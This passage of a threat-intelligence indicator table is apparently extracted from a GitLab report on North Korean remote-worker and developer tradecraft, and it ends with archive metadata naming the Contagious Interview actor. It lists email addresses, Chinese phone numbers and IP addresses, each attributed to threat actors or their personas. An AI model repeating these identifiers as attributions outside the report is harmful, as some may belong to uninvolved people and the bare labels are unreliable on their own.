N/A\r\nThreat actor\r\ncontrolled e\r\njorgencnc960608@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\njose.bfran86@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\njose.bfran86@hotmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nk_star_0131@hotmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nkbsy2019@hotmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nkhatijha555@outlook.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nkk14s@ya.ru email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nknightrogue414@outlook.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nkonachi0531@hotmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nkosong0926@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nkosong0926@hotmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nlava_0208@hotmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nleonardo_perez@hotmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nli.guangri.2020@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nlovinmadrid@hotmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nmarza0219@hotmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nmazheng225@outlook.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 29 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\nmichael-mardjuki@outlook.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nmichael.getz28@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nonepushsing@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nowaisugh75@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\npaku_2018@yahoo.co.jp email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\npohs0131@gmail.com 
email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nr_gi_19950603@hotmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nr_gi19950603@hotmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nraphael.privat@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nrhs0219@hotmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nrksonava1@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nrodev097@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nsilverbead0815@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nsilverbead0815@outlook.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nsu0220@outlook.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nsuperth55@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\ntruelife3188@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nvickydev1018@outlook.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nvictm1121@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nwangsmithsilverstar@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\n8613341122552\r\nphone\r\nnumber\r\ninsider N/A N/A\r\nMobile num\r\nChina-based\r\nmember\r\n8618811177571\r\nphone\r\nnumber\r\ninsider N/A N/A\r\nMobile num\r\nChina-based\r\nmember\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 30 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\n8617701222967\r\nphone\r\nnumber\r\ninsider N/A N/A\r\nMobile num\r\nChina-based\r\nmember\r\n8618911321235\r\nphone\r\nnumber\r\ninsider N/A N/A\r\nMobile num\r\nChina-based\r\nmember\r\n8619910229812\r\nphone\r\nnumber\r\ninsider N/A N/A\r\nMobile num\r\nChina-based\r\nmember\r\n8613381035676\r\nphone\r\nnumber\r\ninsider N/A N/A\r\nMobile num\r\nChina-based\r\nmember\r\ntinsimonov@outlook.com email insider N/A N/A\r\nSynthetic 
pe\r\nemail\r\nbogomildaskalov001@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nblazhejovanovska@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nsarloevtim39@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nantonisharalampopoulos@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\naleksandarradakovic122@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nkrstoilovski@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nfilipbackus@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nbelarosviska@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nladislav.kvarda525@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nnovskapetar@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\npeceyurukov@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nnikolamilev166@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nemil.rysinov@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nvinkolukac.dev@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nvalentincinika@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nbosevskibale6@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 31 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\nvlanosdimitri001@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nPeterVargova@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nvlastimirdeskov001@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\naidaszvikas@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ntrendafilmakedonija001@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ndmitrycebotari@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nchrisgergo00@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nbriangaida12@outlook.com email insider N/A 
N/A\r\nSynthetic pe\r\nemail\r\nwiktor.rogal@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nmichalcopik1@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nalbertdymek@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ndobromirkovachev@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ntoma.andric@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ndanielmonilis@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nvladimirvoski001@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nkolyotroske001@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nborissudar.cro@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nbodorbenci@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nivoloucky@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nyorgosdulev@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nbalazspapp@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\njuliankopala.pol@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nnanusevskitodor@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 32 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\nediurmankovic.cc@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nvuksanbojanic@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nbarry__johnson@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ngary__leduc@hotmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nadamikjelen@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nionguzlok@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nantonijakub11@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nleonidasnefeli@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nalexandrurusu2@outlook.com email insider N/A N/A\r\nSynthetic 
pe\r\nemail\r\nadrianceban1@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nflorinbarbu1@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ndanielsala2@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nivanhorvat2@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nnikolastojanovski2@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ngabrieltamas1@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nvictorajdini@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ngavrilvasilevski001@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nstojannastevski001@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nemirapolloni@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ngorantomik1@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\njonasvarga1@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ndzholedinkov001@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nLaszloEniko@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 33 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\nlazarbulatovic56@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nemilkokolnska@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\niacovlevguzun@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ndovydasmatis@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ntomaskovacova@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nantoninowak12@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nerikslamka1@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nkostasmichalakakou@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\njokubasbieliauskas1@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nstoilesideropoulos001@outlook.com email insider N/A 
N/A\r\nSynthetic pe\r\nemail\r\ndamjandobrudzhanski@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nkutayijaz@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nsimeondimitris001@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nbobituntev001@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nvelyokazepov@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nnestorovskiemilija100@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nankaankahristov@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nrandoviska@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nborislavbabic431@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nbenicdominik81@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nteoantunovic6@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\npopovicjelena727@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nvaskovdime@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 34 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\njozefmtech@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\narchelaosasani@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\njanlindberg80@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nnevenborisov@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ntoni.komadina@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ndamianwalczak.work@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ndenis.dobrovodsky@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nfilip.lovren@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ntomislavjurak@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nemilijan.hristov@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nzoran.parlov@outlook.com email insider N/A 
N/A\r\nSynthetic pe\r\nemail\r\nivanmatic.fs@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nmarcelpaw.lowski@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ntomislavbozic.work@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ndominik.wojk@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\npiotrglowacki.pol@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nleonzielinski.pol@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nstanislav.timko@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\noleg.kaplanski@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nrafael.ratkovic@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nmateusz.moczar@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nnadoyankovic@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ndionizy.kohutek@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 35 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\nemilsvalina@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nkostic.gordan@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\njosipbraut@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nmirantrkulja@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\npavlehristov.work@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nvedranpodrug@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nzvonkobogdan.cr@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nfilipdamevski001@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nalbertoszlar52@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nbenjaminellertsson@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nfedorkadoic@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nizakholmberg12@outlook.com 
email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nmarkusvillig20@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nreigojakobson45@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nmasudtarik69@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nvaikokangur45@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nosogovskiplanini001@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\naleksonikov001@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nangelovaandreev@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nivanopavic13@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ndavorsabolic2@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\njuricleon407@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nkondradgodzki@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 36 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\nvelizarborisov.fs@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ntrivuniliikc519@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nalexandermori1218@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nsmupyknight@outlook.com email insider N/A N/A\r\nDPRK deve\r\nemail\r\nbtrs.corp@gmail.com email insider N/A N/A\r\nDPRK deve\r\nemail\r\nbyolate@gmail.com email insider N/A N/A\r\nDPRK deve\r\nemail\r\nstarneit105@gmail.com email insider N/A N/A\r\nDPRK deve\r\nemail\r\nchrissamuel729@gmail.com email insider N/A N/A\r\nDPRK deve\r\nemail\r\nlozanvranic@gmail.com email insider N/A N/A\r\nDPRK deve\r\nemail\r\nqoneits@outlook.com email insider N/A N/A\r\nDPRK deve\r\nemail\r\nkitdb@outlook.com email insider N/A N/A\r\nDPRK deve\r\nemail\r\nd.musatovdv@gmail.com email insider N/A N/A\r\nDPRK deve\r\nemail\r\nnikola.radomic322@gmail.com email insider N/A N/A\r\nDPRK 
deve\r\nemail\r\nduykhanh.prodev@gmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\nchebiinixon91@gmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\njeffukus@gmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\nmohamed_dhifli@hotmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\nsaputranady@gmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\nryannguyen0303@gmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\nfahrultect@gmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\npatrickjuniorukutegbe@rocketmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\nfahrultech@gmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\nmirzayevorzu127@gmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 37 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\ntsunaminori@gmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\nyhwucss@gmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\nbtrs.corp@gmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\nledanglong@gmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\ncwertlinks@gmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\nbukoyesamuel9@gmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\ngwanchi@gmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\nefezinoukpowe@gmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\nthnam0107@gmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\nvijanakaush@gmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\nluis.miguel208@outlook.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\nsmupyknight@outlook.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\nbrankojovovic99@gmail.com email insider N/A N/A\r\nAdministrat\r\naccounts on\r\nservices\r\nmanuetuazon.work@gmail.com email insider 
N/A N/A\r\nAdministrat\r\naccounts on\r\nservices\r\nupwork.management.whm@outlook.com email insider N/A N/A\r\nAdministrat\r\naccounts on\r\nservices\r\n1.20.169.90 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n103.106.112.166 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n103.152.100.221 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n103.155.199.28 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n103.174.81.10 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 38 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\n103.190.171.37 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n103.39.70.248 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n107.178.11.226 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n107.189.8.240 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n113.160.133.32 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n115.72.1.61 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n117.1.101.198 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n121.132.60.117 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n125.26.238.166 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n139.178.67.134 ipv4 
insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n14.225.215.117 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n143.110.226.180 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n144.217.207.22 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n146.190.114.113 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n147.28.155.20 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n148.72.168.81 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n152.26.229.34 ipv4 insider August\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 39 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\nshared origi\r\n152.26.229.42 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n152.26.229.46 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n152.26.229.47 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n152.26.229.83 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n152.26.229.86 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n152.26.229.93 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n152.26.231.42 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n152.26.231.83 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared 
origi\r\n152.26.231.86 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n152.26.231.93 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n152.26.231.94 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n153.92.214.226 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n157.245.59.236 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n171.228.181.120 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n171.99.253.154 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n172.105.247.219 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 40 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\n173.255.223.18 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n178.63.180.104 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n179.1.195.163 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n184.168.124.233 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n193.227.129.196 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n193.38.244.17 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n194.104.136.243 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n194.164.206.37 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat 
\r\nSource: https://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/"
	],
	"report_names": [
		"gitlab-threat-intelligence-reveals-north-korean-tradecraft"
	],
	"threat_actors": [
		{
			"id": "4fc99d9b-9b66-4516-b0db-520fbef049ed",
			"created_at": "2025-10-29T02:00:51.949631Z",
			"updated_at": "2026-04-10T02:00:05.346203Z",
			"deleted_at": null,
			"main_name": "Contagious Interview",
			"aliases": [
				"Contagious Interview",
				"DeceptiveDevelopment",
				"Gwisin Gang",
				"Tenacious Pungsan",
				"DEV#POPPER",
				"PurpleBravo",
				"TAG-121"
			],
			"source_name": "MITRE:Contagious Interview",
			"tools": [
				"InvisibleFerret",
				"BeaverTail",
				"XORIndex Loader",
				"HexEval Loader"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434935,
	"ts_updated_at": 1775826731,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6190986342b844c6e7130019191deac5190dee64.pdf",
		"text": "https://archive.orkl.eu/6190986342b844c6e7130019191deac5190dee64.txt",
		"img": "https://archive.orkl.eu/6190986342b844c6e7130019191deac5190dee64.jpg"
	}
}